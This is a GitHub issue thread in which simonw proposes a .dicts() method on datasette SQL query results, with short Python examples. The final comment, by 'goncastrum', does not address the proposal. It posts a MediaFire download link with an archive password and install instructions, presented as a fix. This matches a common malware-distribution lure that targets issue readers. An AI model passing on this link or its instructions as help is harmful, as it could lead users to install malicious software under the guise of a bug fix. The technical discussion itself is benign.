### ISSUE TITLE
results.dict() method for SQL query results

### ISSUE THREAD

**Issue by simonw** [simonw/datasette#2414]
I find myself using this pattern all the time:
```python
rows = [dict(r) for r in (await db.execute("select * from t"))]
```

I'm going to add a utility method like this:
```python
rows = (await db.execute("select * from t")).dicts()
```
Relevant code: https://github.com/simonw/datasette/blob/dc288056b81a3635bdb02a6d0121887db2720e5e/datasette/database.py#L658-L684

**Comment by simonw** [comment]
Could I get it to work like this instead?
```python
rows = await db.execute("select * from t").dicts()
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
